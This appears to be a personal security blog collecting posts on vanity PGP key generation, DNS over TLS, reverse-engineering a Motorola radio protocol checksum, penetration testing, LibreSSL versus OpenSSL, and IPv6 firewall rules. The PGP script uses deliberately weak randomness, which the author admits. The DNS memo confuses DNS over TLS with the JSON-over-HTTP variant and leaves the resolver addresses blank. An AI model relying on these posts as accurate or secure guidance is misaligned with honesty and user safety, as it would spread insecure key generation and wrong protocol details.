Generating a “Vanity” PGP Key ID Signature

Here’s a quick bash script I used to generate a “vanity” PGP key with the last two bytes (four hex characters) of the key ID set to FFFF.

#!/usr/bin/env bash

while :; do
    gpg --debug-quick-random -q --batch --gen-key << EOF
Key-Type: RSA
Key-Length: 2048
Name-Email: user@domain
Name-Real: Real Name
Passphrase: yourverylongpassphrasegoeshere
%commit
EOF

    # Check whether the newly generated key ID ends in FFFF
    if gpg -q --list-keys | head -4 | tail -c 5 | grep -q FFFF; then
        echo Break
        exit 1
    fi

    # Not a match: delete the key and try again
    gpg2 --batch -q --yes --delete-secret-and-public-key \
        "$(gpg -q --list-keys | head -4 | tail -n 1)"
done


I also added no-secmem-warning to ~/.gnupg/options to suppress the insecure memory warnings. When I set it to a 1024-bit key, it only took about 3 hours, while a 2048-bit key took about 20 hours.

It goes without saying that my use of insecure randomness is a terrible idea for anyone facing a serious threat model. Also, you’re basically picking a number at random out of 65,536 and hoping for the right combination – but I’m just having fun with it.
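A quick sanity check on those odds (my arithmetic, not from the original post):

```python
# Two bytes (four hex digits) of the key ID must equal FFFF.
# 16 bits -> 65,536 equally likely values, so on average about
# 65,536 keys must be generated before one matches (geometric mean).
p = 1 / 2**16
expected_keys = 1 / p
print(int(expected_keys))  # 65536
```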

DNS over TLS: A Brief Analysis

The following is a quick write-up I presented to my senior leadership regarding DNS over TLS. It was rooted in the mistaken presumption that Google was going to “enforce DNS-over-TLS”. Interestingly, this system is currently in use by Android, but I do not believe it will ever attain mainstream adoption.

High Level Summary

DNS over TLS is a 2016 protocol that allows clients to resolve hostnames over TLS. The client issues a GET request specifying the hostname and record type, and the server responds with the requested data in JSON. All requests are over TCP/853.
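To make the request shape concrete, here is a small sketch in the style of Google’s JSON resolver API (the URL, parameters and sample response below are illustrative assumptions, not taken from the original write-up):

```python
import json
from urllib.parse import urlencode

# Illustrative query URL: hostname and record type as GET parameters.
url = "https://dns.google.com/resolve?" + urlencode({"name": "example.com", "type": "A"})
print(url)

# A JSON response of the general shape such a resolver returns
# (sample data for illustration, not a live reply):
sample = '{"Status": 0, "Answer": [{"name": "example.com.", "type": 1, "TTL": 3600, "data": ""}]}'
reply = json.loads(sample)
for answer in reply["Answer"]:
    print(answer["name"], answer["data"])
```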

The implementation of DNS over TLS lives in the user-space resolution libraries and may even go unnoticed by user-land applications. From a security perspective, this has a noticeable but easily manageable security impact around TLS security and allowing traffic over port 853.

Except for Android, currently no major operating system natively supports DNS over TLS. I do not foresee this protocol gaining mass implementation nor do I see Google’s public DNS servers mandating it for all clients.

Relation to DNSSEC

DNSSEC and DNS over TLS are parallel features of the DNS protocol. DNSSEC is a DNS protocol extension that provides integrity, but fails to provide confidentiality. As such, a Man-in-the-Middle (MitM) attacker could identify potential endpoints or targets. The DNS over TLS protocol provides both integrity and confidentiality, independent of DNSSEC. Additionally, the DNS over TLS client and server do not communicate over the plain DNS protocol.

Security Implications

There are several broad security implications from implementing DNS over TLS. These implications are specific to TLS, not to DNS over TLS itself.

FIPS 140-2 Encryption Module

The FIPS 140-2 publication is a recommended standard for cryptographic modules. As such, any encryption on government IT systems is subject to this standard. In the case of DNS-over-TLS, encryption must be performed through an approved module, most typically OpenSSL.

TLS is not an encryption cipher. TLS is a protocol that provides three aspects of protection: authentication via a server or user certificate, an encryption cipher, and a hashing mechanism.

Protocol Version

Any implementation of DNS over TLS would have to ensure that the TLS version is free from publicly known or feasible attacks. The current version of TLS is revision 1.2, with TLS 1.3 in draft form. All versions of TLS below 1.1 and all versions of Secure Socket Layer (SSL) are vulnerable to various attacks, namely POODLE and padding-oracle attacks.

Certificate Chain

Proper TLS implementations typically utilize a certificate signed by a trusted certificate authority. In the case of DNS-over-TLS, this adds a dependence on the certificate authorities for every resolution. This may not be a problem for an end-user who trusts the commonly trusted root-level certificate authorities. However, root-level certificates are often subject to distrust or influence from hostile state actors, and high-security environments should not blindly trust the decisions of Microsoft or Red Hat.

Encryption Cipher and Hashing Mechanism

TLS is a mechanism to facilitate encryption over a network, and its hashing algorithm provides data verification. Both encryption ciphers and hashing mechanisms are in slow flux and should be closely followed. For example, in 2015 numerous agencies and security researchers reported that they could compromise the RC4 cipher, and Google security researchers reported a collision attack against the SHA-1 hashing algorithm. Both algorithms were widely implemented in the industry.

Open Connections

A TLS connection initialization is computationally expensive. Therefore, the RFC suggests that the client maintain an indefinitely open TCP connection over port 853. This may require an additional firewall rule permitting traffic to the DNS server.


The DNS over TLS protocol was formalized in 2016. Due to its relatively young age, there are currently very few implementations.

As the RFC documentation specifies, DNS over TLS should be implemented at the host resolution library level, particularly the getaddrinfo(3) and gethostbyname(3) functions. As such, the operating system only needs to maintain library ABI compatibility, and the application does not need to implement anything. Currently, only the Android operating system has implemented DNS over TLS, while some Linux user-land tools can perform DNS over TLS resolutions.
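Because resolution happens inside getaddrinfo(3), application code looks the same regardless of how the resolver library obtains the answer. A quick illustration (Python’s socket.getaddrinfo wraps the same libc call; “localhost” is used so the lookup needs no network):

```python
import socket

# The application simply asks for an address; whether the resolver library
# used plain DNS, DNS over TLS, or /etc/hosts is invisible at this layer.
for family, socktype, proto, canonname, sockaddr in socket.getaddrinfo("localhost", 443):
    print(family, sockaddr)
```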

Google Resolution

Google currently implements DNS over TLS on,, 2001:4860:4860::8888 and 2001:4860:4860::8844. Google also offers a web interface which submits a JSON GET request.

For example, a GET request to the resolver URL specifying a hostname returns a JSON-formatted response.

Standard Implementation Method

There are several implementations of DNS over TLS encapsulated in simplified Docker containers. In summary, the containers utilize a standard web server to handle the HTTP layer and communicate with the DNS server over the DNS protocol. This is a standard method of isolating the HTTP layer from the application layer.

Future Speculation

I do not believe that the DNS over TLS protocol will attain mass implementation, nor that Google will mandate it for use of their DNS servers. There are three (3) primary reasons why:

  1. Architecture: Historically, short-term add-ons to a protocol are superseded by permanent changes to the protocol or a parallel revision. If the goal is confidentiality, it can be achieved via an extension to the DNS protocol itself.
  2. Performance: Per Google research, DNS is a bottleneck when a URL pulls from multiple external sources. However, I suspect current DNS resolution is still significantly faster. A UDP-based lookup requires only a UDP socket and a simple sendto(2) call, whereas DNS over TLS requires multiple layers of conversion across potentially multiple machines: from TLS to HTTP across the internet, converted to DNS at the server, and back across the same route.
  3. Standardization: There does not appear to be a DNS over TLS standard. Most implementations utilize HTTP, but this is not specified in the RFC. Additionally, the JSON format differs between implementations.
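To illustrate the performance point: a traditional UDP lookup is a single small datagram handed to sendto(2). A minimal sketch of the DNS wire format (packet construction only, no network I/O; the query ID is arbitrary):

```python
import struct

def build_dns_query(hostname, qtype=1, query_id=0x1234):
    """Build a minimal DNS query packet: 12-byte header, QNAME labels,
    then QTYPE and QCLASS. qtype=1 requests an A record."""
    # Header: id, flags (recursion desired), QDCOUNT=1, AN/NS/ARCOUNT=0
    header = struct.pack(">HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in hostname.split(".")
    ) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, 1)

packet = build_dns_query("example.com")
print(len(packet))  # 29 -- the entire request fits in one datagram
```

Sending it really is one call: `sock.sendto(packet, (resolver_ip, 53))` on a plain UDP socket.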


This paper is based on multiple primary sources.

That time I Reverse-Engineered the Motorola CBEP Protocol

This is the tale of how I reverse-engineered a Motorola CPS radio protocol to make it work on Linux. While this may have been of questionable legality (and I thus lost interest in the project), I learned a lot about how to reverse engineer. I’m writing this entry more than a year after I initially did this, so I may be a little rusty on the details, but this is the gist of it.

My father worked in radio communications, so when he passed I inherited his old EOL Motorola XTS 3000. I got an FCC ham radio license and wanted to utilize this device in service of my fledgling radio hobby. Turns out, this device was the Rolls-Royce of radios in its day. It can operate within the ham bands, can do encryption, digital communication, P25, D-Star and trunking, and pumps out a very clear signal. In short, this was a heavy-duty mission radio.

Motorola XTS3000 Radio

So I purchased a new $30 lithium-ion battery and a programming cable, and then ran into a few unfortunate roadblocks. The first two…

  1. This device cannot be front-panel programmed, which is a fancy way of saying you cannot just key in an arbitrary frequency on the fly. Kinda sucks if you want to change to another random frequency.
  2. Programming could only be done with the proprietary Motorola CPS (Customer Programming Software) – but this was trivially easy to download.

…All of that was trivial compared to the next bomb-shell…

You could only program this device using a hardware serial port on native 32-bit Windows. This means no Windows 7/8/10, no virtual machines, no Linux, and no USB-to-serial adapters.

Radio Reference users lamented that they were forced to maintain an old Windows XP laptop with a serial port for programming their device. I personally went out and purchased a $75 computer off Craigslist. Damn!

Up to this point, here are my thoughts: a serial RS-232 port is a “dumb” port compared to modern USB or PCI devices. In fact, serial does not even have a single standard; it’s whatever the device programmers decide. RS-232 is as close to raw data over a wire as you can get. So why doesn’t this work in a VM? And why can’t I just capture this data, replay it, and have the device function as normal?

Chipping Away at the Secret

I questioned the assumptions and put in an FTDI cross-over cable I made. One end went into the Windows machine, the other end went into my Linux machine, and a final serial-to-radio cable connected to the device. This way my computer was essentially performing a Man-in-the-Middle (MitM) attack, but for serial.

FTDI Cross-over-Cable

I whipped up some C code to relay messages between the Windows machine and the device. When I initialized the connection, the radio beeped! And then nothing happened…the software timed out and complained that the connection to the radio failed. I captured the initialization bytes 0x01,0x02,0x01,0x40,0xF7, and replaying them clearly made the radio do something, but it immediately stopped afterwards.

Serial Capture Cable

I tried this process several times, but it failed. Annoyed, I looked into purchasing an RS-232 snooping cable: a cable with two regular connections that transfer data as normal, plus two tap ports, one that taps pin 2 and another that taps pin 3. For whatever reason, well-built cables cost upwards of $100 online and proper hardware snooping devices cost $500, way above my budget. So I decided it was much cheaper to build my own damn cable, and reused the program I whipped up to read the bits from the transfer.

And it worked!

I saw a flurry of bits fly across the terminal. In the mix, I noticed a subtle pattern: a pause in the transfer, 7 bytes sent, echoed back, another pause, and then another flurry of bits. For example, I saw:


Later on I saw:


and then


If you didn’t catch it, the second-to-last byte increases by 0x20 (32) while the last byte ends in 9. (Spoiler: the repeating 9 was coincidental.) I interpreted this as a value increasing by 32, with the last byte being a checksum. This was actually a lucky half-guess, because I had no way to know that.

When I again tried to replay these same bits, I ran into the same failure.

I briefly attempted to run the program in IdaPro, GNU Debugger for Windows and Immunity Debugger, but this approach failed and I am still not certain why. For example, I found a string that was clearly only utilized in one place in the binary and set an IdaPro breakpoint for when the binary accessed that memory address. But for whatever reason, it did not break. Moreover, I learned the hard way that the Win32 GUI API controls the application flow and is far from linear, so I could not just break after, say, 30,000 GUI instructions and expect to reliably step into the desired code.

I also briefly tried to use some RS-232 snooping tools, but every tool I found relied on a modern .NET framework not available on Windows XP. Moving on…

Win32 API Monitor

A Windows XP zealot on IRC informed me of a Win32 API monitoring application that would monitor DLL files and produce a list of when their functions were executed and with what arguments. That might be useful.

I spent some time reading up on how Windows communicates over serial: it uses CreateFileA() to open the COM1 port, typically listed as "\\.\COM1", and then uses the ReadFile() call, similar to Unix’s read(2) syscall. I expected to see this in the API capture.

Nope! Instead, I saw that the binary used CreateFileA() against Commsb9. Next, I saw it transferring 0xF5,0x01,0x02,0x01,0x40 but not the trailing 0xF7. The Win32 API monitor even told me the driver was communicating using USB IOCTLs — not only is this device serial, USB was barely invented when this program was created. What’s going on here?

Reading the output, I identified that these read/write commands were taking place in VcomSB96.dll, and filtering by that DLL file, I saw that it was loading Commsb96.sys and Commsbep.sys. In my experience, .sys files are always driver files.

The Driver

Looks like we are working with a driver. With my limited background in writing a Linux USB driver, Microsoft’s excellent documentation and websites like this, I had an idea of what I needed to hunt for. The C code would look like this:

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject,
                      IN PUNICODE_STRING pRegistryPath )
{
    NTSTATUS ntStatus = 0;
    UNICODE_STRING deviceNameUnicodeString, deviceSymLinkUnicodeString;

    pDriverObject->DriverUnload = OnUnload;
    pDriverObject->MajorFunction[IRP_MJ_CREATE] = Function_IRP_MJ_CREATE;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = Function_IRP_MJ_CLOSE;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = Function_IRP_DEVICE_CONTROL;
    /* ... */
}


This snippet assigns the driver methods to the pDriverObject struct. I opened up Commsb96.sys in IdaPro, expecting to hunt through from the obligatorily exported DriverEntry symbol and trace where the DeviceIoControl handling initializes. To my surprise, I saw this:

IdaPro with Full Symbols

Wow, that was easy. Turns out, a now-defunct company called Vireo Software, Inc. produced this driver in 1997 and failed to strip out the kernel symbols, making it much easier to reverse. It looks like they used C++ and compiled with optimization. That produced assembly that is a bit difficult to follow, but I eventually traced back to where the DeviceIoControl messages landed in the kernel, and from there tracked down the USB message that Win32 API Monitor detected.

I finally traced code that read 5 bytes from the stack, ran them through a loop that calculated a single byte, and returned that byte. I wish I could claim to have written the code below, but it was actually done by another IRC contact. He had a (probably bootleg) professional version of IdaPro that produced the following C code.

unsigned char sbCRC(const unsigned char *msgbuf, const int len) {
     const unsigned char table[8] = {}; // REDACTED FROM THE BLOG TO AVOID LEGAL TROUBLE!

     unsigned char a, b, n = 0;
     int i = 0;

     while (i < len) {
          n = (unsigned char)*(msgbuf + i) ^ n;
          a = ((unsigned char)((signed char)n >> 1) >> 1) ^ n;
          b = a;
          a = ((signed char)a << 1) & 0xF0;
          b = (signed char)b >> 1;
          if (b & 0x80)
               b = ~b;
          n = (a + (b & 0x0F)) ^ table[n & 0x07];
          i++;
     }

     return n;
}
I tested this function against known values such as 0xF5,0x11,0x20,0x00,0x00,0x00 that I cited before, and it resulted in 0xD9. Boom! Checksum reversed!
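Out of curiosity, the routine ports almost line-for-line to Python. The lookup table below is a zeroed placeholder (the real values are redacted above), so the output will not match the real 0xD9; the bit-twiddling, including the signed-char arithmetic shifts, is preserved:

```python
TABLE = [0] * 8  # placeholder -- the real table is redacted in the post

def _signed(x):
    """Reinterpret a byte (0-255) as a C signed char (-128..127)."""
    return x - 256 if x > 127 else x

def sb_crc(msg):
    n = 0
    for byte in msg:
        n = (byte ^ n) & 0xFF
        # ((unsigned char)((signed char)n >> 1) >> 1) ^ n
        a = ((((_signed(n) >> 1) & 0xFF) >> 1) ^ n) & 0xFF
        b = a
        a = (_signed(a) << 1) & 0xF0      # ((signed char)a << 1) & 0xF0
        b = (_signed(b) >> 1) & 0xFF      # (signed char)b >> 1
        if b & 0x80:
            b = ~b & 0xFF
        n = ((a + (b & 0x0F)) ^ TABLE[n & 0x07]) & 0xFF
    return n

print(hex(sb_crc(bytes([0xF5, 0x11, 0x20, 0x00, 0x00, 0x00]))))
```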

The Missing Link – RS-232 Flow Control

Coming of age in the 2000s, I learned about effectively full-duplex buses such as USB or PCI. On modern buses you can effectively send data asynchronously, but RS-232 often requires manual flow control via the CTS, DSR, RTS and DTR pins.

Providentially, around this time I found the amazing tool 232Analyzer, which was the only tool of its sort that did not require a modern .NET framework. Had I found it earlier, it would have saved me a lot of time! But I learned so much along the way.

232Analyzer Capture

Putting it all Together

With that, I modified my Python code to emulate the flow control, calculate the checksum and send the resulting bytes over. And this time…it worked! I could replay messages from the original CPS and the radio responded with the same flutter of meaningless data.

Asking around on forums and IRC, and reading up on the Motorola hardware, I learned that these sorts of devices do not request or set specific values from the radio as an API abstraction layer might do. Instead, you request memory locations and interpret those locations according to a pre-known memory map. I deduced that the 0xF5,0x11 bytes meant “read”, the 0x20 is some sort of divider (or maybe more?), the next 3 bytes are a memory location, and the final byte is a checksum.
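Under that hypothesis, a read request could be sketched like this. The field names and the stub checksum are my guesses for illustration; the real checksum is the reversed sbCRC routine, whose lookup table is redacted above:

```python
def sb_crc_stub(data: bytes) -> int:
    """Stand-in for the reversed sbCRC checksum (its table is redacted),
    so this just returns a dummy byte."""
    return 0x00

def build_read_request(address: int) -> bytes:
    # 0xF5 0x11 = deduced "read" opcode, 0x20 = divider(?),
    # followed by a 3-byte memory address and a checksum byte.
    body = bytes([0xF5, 0x11, 0x20]) + address.to_bytes(3, "big")
    return body + bytes([sb_crc_stub(body)])

frame = build_read_request(0x000000)
print(frame.hex())  # f5112000000000 with the stub checksum
```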

Armed with this hypothesis, I found the memory location of the device serial number, and my code could read it. I tested this on my second radio, and it correctly retrieved the serial number.

To find other values, I recorded a read of the radio memory, made a single change, then read the memory again and compared the difference to isolate values. I was able to find frequency values, channel names, signal strength values, etc.! With time, I could have mapped out the entire address space! I even found the write prefix, but was too scared to test it for fear of bricking my radio.

Anti-Climactic Ending

Somewhere along the way, I wondered “wait…is this legal?” I contacted the EFF. They were extremely eager to get back to me, and after a long conversation the lawyer suspected that because the CPS has a copyright notice and I did not…um…come into acquisition of it through a financial transaction (sure, that phrasing works), it was likely illegal to distribute the reverse-engineered code.

And mapping out the memory got really tedious and annoying. And I started watching The Walking Dead.

And right about here my journey ended.


But I learned so much!

  1. How Windows device drivers work
  2. Windows API calls (turns out, they don’t suck)
  3. How to reverse engineer code with IdaPro
  4. How RS-232 traffic flow works
  5. A buncha tools!

Thoughts? Should I have kept going?

Two Types of Penetration Testers

There are two types of penetration testers in the industry.

Those who identify risk and vulnerabilities beyond a simple Nexpose/Nessus/Qualys scan. And those who want to “win”.

The job of the “winner” is to get DA on their client’s network. Great! But once they’ve gotten it, they show off. Look how much information I can get with the DA account! I can get access to these databases and these spreadsheets. Sensitive Information! Be afraid! I pwned you noobs!!!

The other type of penetration tester also seeks DA. He finds it. Great! Now he moves on to another vulnerability. And then another. Can I get DA another way? Maybe? Okay, what else is exploitable here? Along the way, if he finds sensitive information, he presents it to the client. But his job is not focused on presenting information, it’s on finding avenues to find information.

The “winner” focuses on one issue. He writes his report and presents it to the client. The client is enamored, impressed, even afraid. But because the first tester only focused on one issue, if another “winner” penetration tester were to come in tomorrow, the second would just find another avenue. A third might find a third issue. Until they are merely playing whack-a-mole.

The second type reports the issues he identified: an array of vulnerabilities, ranked by severity. He may briefly present information he was able to access, but then moves on. His job is to work towards resolution, not to play hacker. Overall security is enhanced.

Thoughts? No? I didn’t think so, no one reads this blog.

LibreSSL: The Secure OpenSSL Alternative

I originally published the following article with the InfoSec Institute, but I figured I would re-publish it on my personal blog.

Perhaps the most devastating vulnerability in recent years was OpenSSL’s Heartbleed exposure. This is just the latest in a series of major vulnerabilities affecting a linchpin security software package. Why does this continue to happen? What are the solutions? Moreover, could LibreSSL be an industry-level replacement to OpenSSL?

OpenSSL was initially developed in 1995 as a commercial-grade, open-source, fully featured toolkit implementing Secure Socket Layer (SSL) and Transport Layer Security (TLS), and as a general-purpose cryptographic software library. OpenSSL was adopted by various operating systems and major applications as their primary cryptographic library, including all main Linux distributions, BSD variants and Solaris, and is heavily utilized by Windows. However, perhaps due to its success, rapid adoption and diverse implementation, the quality of the code eroded. What should be mature code with a relatively simple and concise objective has grown into an array of tangentially related features, a patchwork of “quick fixes”, and excessive backwards compatibility and portability, to the detriment of the security of the product.

Enter LibreSSL. LibreSSL began as a fork of OpenSSL 1.0.1g. Developed by the OpenBSD team, LibreSSL is designed to be a drop-in replacement for OpenSSL. Its stated goals are code modernization, security and software development best practices. In the past 18 months, the code has made impressive strides toward those goals. It has also made controversial decisions, including removing widely used features and jettisoning oft-used government standards. Could this software package replace OpenSSL?

This paper compares OpenSSL and LibreSSL as the main encryption library for production environments across the following areas:

  • Direction and Progress
  • Security
  • Performance
  • Compatibility and Portability
  • Functionality

Code Modernization and Cleanup

A primary critique of OpenSSL is that the code sacrificed industry best practices, code review and remediation, and structured development in favor of rapid portability and functionality. Specifically, critics cited the following problems:

  • Multiple implementations of a task, depending on the OS, architecture or compiler, resulting in multiple points of failure.
  • Unorthodox implementations to accommodate failures in Operating Systems, architectures or compilers.
  • Code unreadability, such as a labyrinth of C preprocessor statements.
  • Custom implementation of standard C library calls, such as printf() or memory management.
  • A patchwork of “quick-fixes” rather than solving fundamental design flaws.


OpenSSL aims for portability across all systems, including those that do not support standard C functions. It accomplishes this by creating an abstraction layer and reimplementing APIs that should be provided by the OS. This resulted in a non-standard OpenSSL C library variant, distinct from standard C, that does not undergo the same level of public scrutiny, maturity and secure best practice.

LibreSSL tackles these issues by assuming that the code is designed for a modern, POSIX-compliant OS on a modern architecture, using a compiler that conforms to standard C. Namely, LibreSSL assumes that the target system is OpenBSD. In cases where an OpenBSD-specific C call does not exist elsewhere, LibreSSL ports only that function and maintains the same symbol, so as not to create an abstraction layer.

Additionally, this assumption afforded LibreSSL developers the freedom to remove antiquated, CPU-specific, OS-specific, compiler-specific or otherwise non-standard code. One example is the get_ip() function, which parses an IP address string and returns each octet in a character array. Rather than utilizing gethostbyname(), which became part of the GNU C Library in 1997, OpenSSL chose this implementation because Visual C 1.52c, dated 1995, contained an unresolved DLL error with the sscanf() function. To date, LibreSSL has removed 140,000 lines of code, or 23%.

Memory Management

OpenSSL insisted on portability across every platform, irrespective of its capabilities. This became problematic when the OS or the C library was unable to meet cryptographic requirements. Examples included:

  • Operating systems that did not contain the malloc(3) function
  • Unacceptable latency when allocating or freeing memory
  • Inability to allocate 64-bit objects

OpenSSL solved these problems by developing an internal memory management system, distinct from the OS’s. This layer was a fixed Last-In-First-Out (LIFO) stack that assigned memory to requesting objects, but never sanitized or freed used memory back to the OS. While this assisted in portability, it created numerous challenges, namely:

  • OpenSSL code maintenance and readability became extremely difficult.
  • Common memory-analysis tools, such as Valgrind, are designed to analyze fixed buffers assigned to individual variables. Abstracting memory management from the OS made buffer overflow detection virtually impossible.
  • The LIFO memory architecture virtually ensured that exposed memory contained sensitive information, as evidenced by the Heartbleed vulnerability.
  • Memory leaks were created that could not be detected by leak-detection tools.

LibreSSL simplified the process by shifting the responsibility of memory management back to the OS. To this end, LibreSSL entirely removed the OpenSSL memory management layer, simplified the higher-level macros, and utilized POSIX C libraries. Developers commented that this revealed thousands of buffer overflow errors, which were subsequently corrected.

Ticket Remediation

The OpenSSL Software Foundation (OSF) appeared slow or uninterested in remediating documented issues. As a metric, upon LibreSSL’s initial release in April 2014, OpenSSL’s bug ticket system contained 1104 open tickets, with the earliest dating back to April 2002. To date, 115 items from that list remain unremediated. The stagnation of ticket remediation exacerbated disinterest in community contribution. As part of its goals, LibreSSL remediated all open tickets and shared newly identified vulnerabilities with the OpenSSL team.


Security

Security is a central goal for LibreSSL, which it aims to achieve through increased code readability and review, removal of insecure functionality, and memory sanitization.

Code Readability

As discussed, LibreSSL assumes a level of competence in the underlying platform. This afforded LibreSSL developers the freedom to remove large swaths of confusing or unwieldy code, such as nested preprocessor statements for specific OSs or architectures. Though this may not immediately result in enhanced security, it has allowed outside developers to review the code with greater ease and contribute to its security and overall quality.

Functionality Removal

With the disclosure of the POODLE vulnerability, security analysts deemed SSLv3 insecure and unfit for use in production environments. However, many environments still require SSLv3 for legacy purposes and are unable to migrate to TLSv1.1. To this end, OpenSSL maintains backwards compatibility with SSLv3, and all applications compiled for SSLv3 remain operational. Conversely, LibreSSL 2.2.2 entirely removed SSLv3 support. Additionally, LibreSSL removed weak or broken cipher suites, including Secure Remote Password (SRP), Pre-Shared Key (PSK) and all export ciphers, while adding support for the ChaCha, GOST and IDEA ciphers. While LibreSSL’s decisions technically enhance security, they may be negatively impactful in environments that require legacy SSLv3 support.


Random Number Generation

Random number generation is a critical aspect of cryptography. Without proper seeding, an attacker may be able to predict private encryption keys.

OpenSSL relies on the operating system to generate random numbers. On UNIX and Unix-like systems, this typically means reading from /dev/urandom or /dev/random. However, in the event that the OS is unable to generate random numbers, OpenSSL provides the RAND_add(3SSL) and RAND_seed(3SSL) API calls, allowing users to seed the PRNG.

LibreSSL shifts the responsibility of random number generation entirely onto the OS. LibreSSL vestigially maintains these functions for binary compatibility, but removed all associated code. It is worth noting that, due to the lack of seeding, the initial release of LibreSSL contained a critical flaw in the PRNG, where two forked processes could contain the same PRNG state and thus generate the same random data. This vulnerability was quickly patched.

Memory Sanitization

Memory sanitization is a central feature in LibreSSL that is lacking in OpenSSL. Prior to the deallocation of objects, LibreSSL explicitly zeros out memory using OpenBSD’s explicit_bzero(3) function. This proactively reduces the impact of memory exposure in the event of a future vulnerability or an unprivileged process gaining control of a tainted memory segment. The LibreSSL team created a portable module for OSs that do not have these OpenBSD-specific API calls.
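The same idea can be sketched in Python, with ctypes.memset standing in for explicit_bzero(3) (a best-effort illustration only; Python gives no guarantees about stray copies of the data):

```python
import ctypes

def zeroize(buf: bytearray) -> None:
    """Best-effort analogue of OpenBSD's explicit_bzero(3):
    overwrite a sensitive buffer in place before it is released."""
    backing = (ctypes.c_char * len(buf)).from_buffer(buf)
    ctypes.memset(backing, 0, len(buf))
    del backing  # release the buffer export so the bytearray is usable again

secret = bytearray(b"hunter2")
zeroize(secret)
print(secret)  # bytearray(b'\x00\x00\x00\x00\x00\x00\x00')
```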

Common Vulnerability Enumerations

Since LibreSSL is a fork of OpenSSL 1.0.1g, it is subject to many of the same issues and vulnerabilities that affect OpenSSL. From LibreSSL’s initial release in April 2014 to today, there have been 45 CVEs affecting OpenSSL. Of those, only 24 affected LibreSSL, with one additional vulnerability affecting only LibreSSL. This is demonstrable proof that LibreSSL has made strides in security.

FIPS 140-2 Compliance

The OSF sought to make OpenSSL FIPS 140-2 compliant. Consequently, OSF created the OpenSSL FIPS Object Module, which provides an API to invoke FIPS-approved cryptographic functions. This is particularly important for Federal IT systems that are obligated to comply with FIPS 140-2. Conversely, LibreSSL removed the FIPS module from its code, arguing that FIPS 140-2 relies on weak or broken ciphers and is detrimental to security. LibreSSL is neither FIPS 140-2 compliant nor is compliance a goal of the project. This is potentially impactful for risk-averse government IT systems that are required to comply with FIPS 140-2.


Compatibility and Portability

As discussed, LibreSSL was written specifically for OpenBSD, and the OpenBSD team ported LibreSSL to modern OSs that conform to POSIX standards. Consequently, legacy systems or systems that do not conform to POSIX are unable to run LibreSSL.

Application Support

LibreSSL aims to be a drop-in replacement for OpenSSL with no changes to existing applications. LibreSSL achieves compatibility by maintaining exposed API calls, even if their functionality is nullified. However, many applications, such as Apache Web Server, must be lightly patched before they will link with LibreSSL. This is mostly due to removed features or the removal of unnecessarily exposed interfaces.

OS Support

The LibreSSL team has ported it to numerous operating systems, including Linux, Windows, FreeBSD, OS X, and Solaris. It is worth noting that outside of OpenBSD, no operating system has pre-compiled package-level support for LibreSSL. Thus, all binaries and applications must be manually compiled and manually upgraded. LibreSSL explicitly removed support for Classic Mac OS, 16-bit Windows, DOS, VMS, and OS/2.


Performance

Performance tests were performed on two stock Ubuntu 14.04 LTS virtual machines running kernel 3.19.0-28-generic and Apache 2.4.16. Both virtual machines ran on a single core of an Intel(R) Core(TM) i7-4712MQ CPU @ 2.30GHz with 2 gigabytes of RAM, and ran OpenSSL 1.0.1g and LibreSSL 2.3.0, respectively. The test utilized ApacheBench version 2.3 with 100,000 requests per test for a payload of 45 bytes.

In terms of speed, OpenSSL outperforms, or is at worst comparable to, LibreSSL across all tested ciphers. The performance impact is attributed to the explicit memory sanitization operations within LibreSSL that are not present in OpenSSL, and to optimization features that were disabled in LibreSSL.


Both LibreSSL and OpenSSL have advantages and disadvantages, depending on a given application, requirement or tolerance.

From a purely security perspective, LibreSSL is the clear winner: it proactively addresses security concerns, disables broken ciphers and protocols, and builds security into its design. OpenSSL employs a reactive approach and fails to adequately address security in its design. In addition, while the two projects still share many of the same vulnerabilities, one can anticipate that the number of shared vulnerabilities will diminish going forward.

However, this approach also has a downside. LibreSSL’s focus on security means that it is not backwards compatible with deprecated ciphers or protocols and therefore will not function in legacy environments. Additionally, LibreSSL’s stated refusal to comply with FIPS 140-2 effectively guarantees government systems and enterprise-level OSs will never utilize it.

OpenSSL outperforms LibreSSL in portability. This is not due to a failure in LibreSSL, but is instead a testament to OpenSSL's successful adaptation. Since no major operating system currently supports LibreSSL, LibreSSL and dependent applications must be manually compiled and installed, rather than utilizing the package management systems of FreeBSD, Debian, Ubuntu or Red Hat.

In terms of performance, OpenSSL exceeds LibreSSL across all ciphers. As stated, this is attributable to LibreSSL's explicit memory sanitization operations. The performance difference may be negligible in low-traffic applications, but can be impactful in large, latency-sensitive production environments.

Both LibreSSL and OpenSSL have their strengths and weaknesses. OpenBSD has demonstrated that LibreSSL is ready for production environments, but has yet to be widely deployed. Ultimately, the choice between LibreSSL and OpenSSL is a variant of the perennial question of security versus functionality.

IPv6 Firewall Rules

I set up a Hurricane Electric tunnel to get my house on IPv6 (Verizon fails to deliver!) and was given a /64 allocation. I then set up a Router Advertisement daemon to get every computer online. Yippee!

But, there’s a problem…now every computer in my house is exposed to the wrath of the Internet. While the auto-configured (SLAAC) client addresses are “random”, an attacker can still discover a client’s address through a variety of means. So I set up some basic IPv6 firewall rules to protect my clients.

Here is my script:


# Default policy: drop anything that no rule below accepts
ip6tables -P FORWARD DROP

# Accept SSH
ip6tables -A FORWARD -p tcp --dport 22 -j ACCEPT

# Accept everything locally
ip6tables -A FORWARD -i eth0 -o he-ipv6 -j ACCEPT

# Accept all ICMPv6, kinda necessary 
ip6tables -A FORWARD -i he-ipv6 -o eth0 -p icmpv6 -j ACCEPT

# Accept return traffic for stateful connections that our clients initiated
ip6tables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

Here is an explanation:

  1. The default FORWARD policy is to drop all packets
  2. I accept all forwarded packets on port 22 (SSH) – This is because I frequently ssh into my personal machine while on the road.
  3. I accept all ICMPv6 packets: first because I want to be able to test pings and such, but also because it's required for IPv6 to function properly
  4. I accept all return packets for connections that my clients initiated. This means I can arbitrarily connect out, but others cannot arbitrarily connect in.

I tested this out and it worked! There, now my personal home printer is not online 🙂

Giving credit where credit is due, I borrowed a lot from Fabio Firmware.

Four Simple Technologies for Privacy We Should All Know

The recent PRISM scandal has made me concerned about security and privacy, even more than before. I truly do not think that the government is spying on me as an individual and will (hopefully) never kick down my doors and take me to the Ministry of Luv. I have nothing to hide. But that's not the point. It's the principle. You have no right, neither moral nor practical, to monitor my communication. In fact, we have explicit rights protecting us!

